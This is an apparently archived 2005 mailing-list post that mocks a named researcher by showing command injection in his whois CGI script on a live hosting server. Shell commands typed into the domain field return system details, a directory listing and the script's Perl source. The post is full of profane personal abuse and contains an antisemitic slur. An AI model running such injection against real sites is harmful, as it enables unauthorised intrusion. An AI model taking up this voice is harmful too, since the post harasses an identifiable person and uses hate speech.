[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <71ebdef050803050457340ffe@mail.gmail.com>
Date: Thu Aug 4 03:03:19 2005
From: joxeankoret at gmail.com (Joxean Koret)
Subject: Fernando Gont remote command execution and big
mouth vulnerability
SHUT THE FUCK UP!!! AND FIX YOUR FUCKING WEBSITE!!! WE ARE ALL SICK
OF YOUR BORING E-MAILS!!!! MOTHERFUCKER!
http://thor.prohosting.com/fgont/cgi-bin/whois.pl
whois for domain: uname -a
FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3
#0: Fri Nov 5 10:49:09 MST 2004
jblack@...r.prohosting.com:/usr/obj/usr/src/sys/LOCAL i386
and whois for domain: id
uid=59286(u0638237) gid=1000(user) groups=1000(user)
and for ls -la
whois ls -la
total 124
dr-xr-xr-x 2 u0638237 2000 512 Dec 28 2003 .
drwxr-xr-x 6 u0638237 2000 512 Jul 21 04:35 ..
-rwxr-xr-x 1 u0638237 2000 15091 Jul 30 2003 cgi-lib.pl
-rwxr-xr-x 1 u0638237 2000 621 Jun 24 2003 cli.pl
-rwxr-xr-x 1 u0638237 2000 993 Jul 30 2003 dig.pl
-rwxr-xr-x 1 u0638237 2000 4388 Dec 28 2003 fuente.cgi
-r--r--r-- 1 u0638237 2000 552 Jun 25 2003 p1.txt
-r--r--r-- 1 u0638237 2000 549 Jul 7 2003 p1dig.txt
-r--r--r-- 1 u0638237 2000 556 Jul 7 2003 p1host.txt
-r--r--r-- 1 u0638237 2000 577 Jul 7 2003 p1ns.txt
-r-xr-xr-x 1 u0638237 2000 562 Dec 28 2003 p1whois.txt
-r--r--r-- 1 u0638237 2000 192 Jun 25 2003 p2.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2dig.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2host.txt
-r--r--r-- 1 u0638237 2000 192 Jul 7 2003 p2ns.txt
-rwxrwxrwx 1 u0638237 2000 192 Dec 27 2003 p2whois.txt
-rwxr-xr-x 1 u0638237 2000 10171 Dec 28 2003 whois.cgi
-rwxr-xr-x 1 u0638237 2000 842 Dec 28 2003 whois.pl
BREAKING NEWS... for registrants of domain cat whois.pl
whois cat whois.pl
#!/usr/local/bin/perl
require('cgi-lib.pl');
&ReadParse;
$p1="p1whois.txt";
$p2="p2whois.txt";
print "Content-type: text/html\r\n\r\n";
$string = $in{'direccion'};
$_ = $string;
$string=~ s/\>//g;
.....
$cmd ----->> YOU FUCKING JEW!!!!!!!!!!!
"; open(p2); while($linea=){ print "$linea"; } close(p2);
Turkey hunters, inc
"knock, knock, Neo follow the white turkey!!"
"Fernando Gont" <fernando@....utn.edu.ar>
> Folks,
>
> My posts to this list have tried to show how easy it is to perform ICMP
> attacks against TCP.
>
> The attacks are blind, so the attacker does not need to be a "man in the
> middle" to perform then. The typical number of packets required to perform
> any of these attacks is about 16000 (in many cases, the attacker requires
> fewer packets). This means that even when a 128kbps link, it will take the
> attacker much less than a minute to perform them.
.....
> Fernando Gont
> e-mail: fernando@...t.com.ar || fgont@....org
Powered by blists - more mailing lists